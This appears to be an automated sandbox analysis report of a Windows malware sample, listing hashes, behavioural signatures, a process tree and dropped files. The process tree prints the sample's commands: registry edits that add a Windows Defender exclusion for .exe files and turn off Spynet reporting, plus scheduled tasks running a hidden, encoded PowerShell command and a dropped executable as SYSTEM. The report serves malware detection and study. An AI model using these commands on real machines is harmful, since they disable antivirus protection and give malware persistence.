Analysis
-
max time kernel
179s -
max time network
183s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system -
submitted
24-11-2022 19:11
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20220901-en
Behavioral task
behavioral2
Sample
file.exe
Resource
win10v2004-20221111-en
General
-
Target
file.exe
-
Size
7.3MB
-
MD5
fc2584e28d3a565d5787357b7e8b4f1d
-
SHA1
df7aa1db56e6c92c5260440874ff286d4e4fabd0
-
SHA256
da773e6f569c5c5b76ec58c61d1e30c7eda614e92929217d74377bb017e6d972
-
SHA512
2da477731aaedb2e663fc6ed62cca867bf233d903d69985670d5598266b82b266bb8d20e27e74d028a36472a9b0225c2dc3b869aa62483e4ba5498650d52cbb6
-
SSDEEP
196608:91OJAYQ8JX1ZiuVlta2EjcMNo2/tzycPN7lcpvvoDFyQbv:3OJAd8J1kWlc1No21z3l7EHoJLbv
Malware Config
Signatures
-
Executes dropped EXE 2 IoCs
Processes:
Install.exeInstall.exepid process 4520 Install.exe 2416 Install.exe -
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Install.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Install.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\Control Panel\International\Geo\Nation Install.exe -
Drops file in System32 directory 1 IoCs
Processes:
Install.exedescription ioc process File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe -
Drops file in Windows directory 1 IoCs
Processes:
schtasks.exedescription ioc process File created C:\Windows\Tasks\bbsSMGQQDZvgelOgpL.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 4588 schtasks.exe 1640 schtasks.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
Processes:
Install.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.EXEpid process 1700 powershell.EXE 1700 powershell.EXE -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.EXEdescription pid process Token: SeDebugPrivilege 1700 powershell.EXE -
Suspicious use of WriteProcessMemory 44 IoCs
Processes:
file.exeInstall.exeInstall.exeforfiles.exeforfiles.execmd.execmd.exepowershell.EXEdescription pid process target process PID 2232 wrote to memory of 4520 2232 file.exe Install.exe PID 2232 wrote to memory of 4520 2232 file.exe Install.exe PID 2232 wrote to memory of 4520 2232 file.exe Install.exe PID 4520 wrote to memory of 2416 4520 Install.exe Install.exe PID 4520 wrote to memory of 2416 4520 Install.exe Install.exe PID 4520 wrote to memory of 2416 4520 Install.exe Install.exe PID 2416 wrote to memory of 3828 2416 Install.exe forfiles.exe PID 2416 wrote to memory of 3828 2416 Install.exe forfiles.exe PID 2416 wrote to memory of 3828 2416 Install.exe forfiles.exe PID 2416 wrote to memory of 2208 2416 Install.exe forfiles.exe PID 2416 wrote to memory of 2208 2416 Install.exe forfiles.exe PID 2416 wrote to memory of 2208 2416 Install.exe forfiles.exe PID 3828 wrote to memory of 4548 3828 forfiles.exe cmd.exe PID 3828 wrote to memory of 4548 3828 forfiles.exe cmd.exe PID 3828 wrote to memory of 4548 3828 forfiles.exe cmd.exe PID 2208 wrote to memory of 1652 2208 forfiles.exe cmd.exe PID 2208 wrote to memory of 1652 2208 forfiles.exe cmd.exe PID 2208 wrote to memory of 1652 2208 forfiles.exe cmd.exe PID 4548 wrote to memory of 4532 4548 cmd.exe reg.exe PID 4548 wrote to memory of 4532 4548 cmd.exe reg.exe PID 4548 wrote to memory of 4532 4548 cmd.exe reg.exe PID 1652 wrote to memory of 2280 1652 cmd.exe reg.exe PID 1652 wrote to memory of 2280 1652 cmd.exe reg.exe PID 1652 wrote to memory of 2280 1652 cmd.exe reg.exe PID 4548 wrote to memory of 4396 4548 cmd.exe reg.exe PID 4548 wrote to memory of 4396 4548 cmd.exe reg.exe PID 4548 wrote to memory of 4396 4548 cmd.exe reg.exe PID 1652 wrote to memory of 3760 1652 cmd.exe reg.exe PID 1652 wrote to memory of 3760 1652 cmd.exe reg.exe PID 1652 wrote to memory of 3760 1652 cmd.exe reg.exe PID 2416 wrote to memory of 4588 2416 Install.exe schtasks.exe PID 2416 wrote to memory of 4588 2416 Install.exe schtasks.exe PID 2416 wrote to memory of 4588 2416 Install.exe schtasks.exe PID 2416 wrote to memory of 2120 2416 Install.exe schtasks.exe PID 2416 wrote to memory of 2120 2416 Install.exe schtasks.exe PID 2416 wrote to memory of 2120 2416 Install.exe schtasks.exe PID 1700 wrote to memory of 5092 1700 powershell.EXE gpupdate.exe PID 1700 wrote to memory of 5092 1700 powershell.EXE gpupdate.exe PID 2416 wrote to memory of 3868 2416 Install.exe schtasks.exe PID 2416 wrote to memory of 3868 2416 Install.exe schtasks.exe PID 2416 wrote to memory of 3868 2416 Install.exe schtasks.exe PID 2416 wrote to memory of 1640 2416 Install.exe schtasks.exe PID 2416 wrote to memory of 1640 2416 Install.exe schtasks.exe PID 2416 wrote to memory of 1640 2416 Install.exe schtasks.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSF83F.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS6060.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gkOjvlmYE" /SC once /ST 08:11:04 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gkOjvlmYE"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gkOjvlmYE"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bbsSMGQQDZvgelOgpL" /SC once /ST 20:15:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\KUdrePT.exe\" DC /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\7zS6060.tmp\Install.exeFilesize
6.8MB
MD5893793fbd70ba4a92919d09205d6c9c1
SHA1cb1832f1f9652faece655ffbf49d82feb98ca85a
SHA256a240fda428ecca831c7730c83f40be6f43bb8370f33d8d66d4844b734011c57b
SHA512e4e30918b96bd5b7d0b8bc6ac189b1ebad645b12e0ac3de061daa9e7003d6e746fee1c6d9cb637a7aa19543b3339c08dbdb1e35a78628e8764a07dedb3a73dc4
-
C:\Users\Admin\AppData\Local\Temp\7zS6060.tmp\Install.exeFilesize
6.8MB
MD5893793fbd70ba4a92919d09205d6c9c1
SHA1cb1832f1f9652faece655ffbf49d82feb98ca85a
SHA256a240fda428ecca831c7730c83f40be6f43bb8370f33d8d66d4844b734011c57b
SHA512e4e30918b96bd5b7d0b8bc6ac189b1ebad645b12e0ac3de061daa9e7003d6e746fee1c6d9cb637a7aa19543b3339c08dbdb1e35a78628e8764a07dedb3a73dc4
-
C:\Users\Admin\AppData\Local\Temp\7zSF83F.tmp\Install.exeFilesize
6.3MB
MD5b7a2858c0b452218cb49839d0a9acbc1
SHA16af3be70f7ba92abe9a24561d3f8db1eb2c8834b
SHA256529aa021ae449b2574f09baae8f298b1d647befcbd0dbcea4036b2f3c8db7104
SHA512e8712076d86dbea94d3f7d8c5529e818dc07ceb6259548bbde2a70ad7c4fa16a241928ccaaa3993c6b18b6694fe79415d5efbfb7c9aaecb29ef661e0ccb17492
-
C:\Users\Admin\AppData\Local\Temp\7zSF83F.tmp\Install.exeFilesize
6.3MB
MD5b7a2858c0b452218cb49839d0a9acbc1
SHA16af3be70f7ba92abe9a24561d3f8db1eb2c8834b
SHA256529aa021ae449b2574f09baae8f298b1d647befcbd0dbcea4036b2f3c8db7104
SHA512e8712076d86dbea94d3f7d8c5529e818dc07ceb6259548bbde2a70ad7c4fa16a241928ccaaa3993c6b18b6694fe79415d5efbfb7c9aaecb29ef661e0ccb17492
-
memory/1640-156-0x0000000000000000-mapping.dmp
-
memory/1652-144-0x0000000000000000-mapping.dmp
-
memory/1700-154-0x00007FF811B00000-0x00007FF8125C1000-memory.dmpFilesize
10.8MB
-
memory/1700-153-0x00007FF811B00000-0x00007FF8125C1000-memory.dmpFilesize
10.8MB
-
memory/1700-151-0x00000142A28F0000-0x00000142A2912000-memory.dmpFilesize
136KB
-
memory/2120-150-0x0000000000000000-mapping.dmp
-
memory/2208-142-0x0000000000000000-mapping.dmp
-
memory/2280-146-0x0000000000000000-mapping.dmp
-
memory/2416-138-0x0000000010000000-0x000000001119D000-memory.dmpFilesize
17.6MB
-
memory/2416-135-0x0000000000000000-mapping.dmp
-
memory/3760-148-0x0000000000000000-mapping.dmp
-
memory/3828-141-0x0000000000000000-mapping.dmp
-
memory/3868-155-0x0000000000000000-mapping.dmp
-
memory/4396-147-0x0000000000000000-mapping.dmp
-
memory/4520-132-0x0000000000000000-mapping.dmp
-
memory/4532-145-0x0000000000000000-mapping.dmp
-
memory/4548-143-0x0000000000000000-mapping.dmp
-
memory/4588-149-0x0000000000000000-mapping.dmp
-
memory/5092-152-0x0000000000000000-mapping.dmp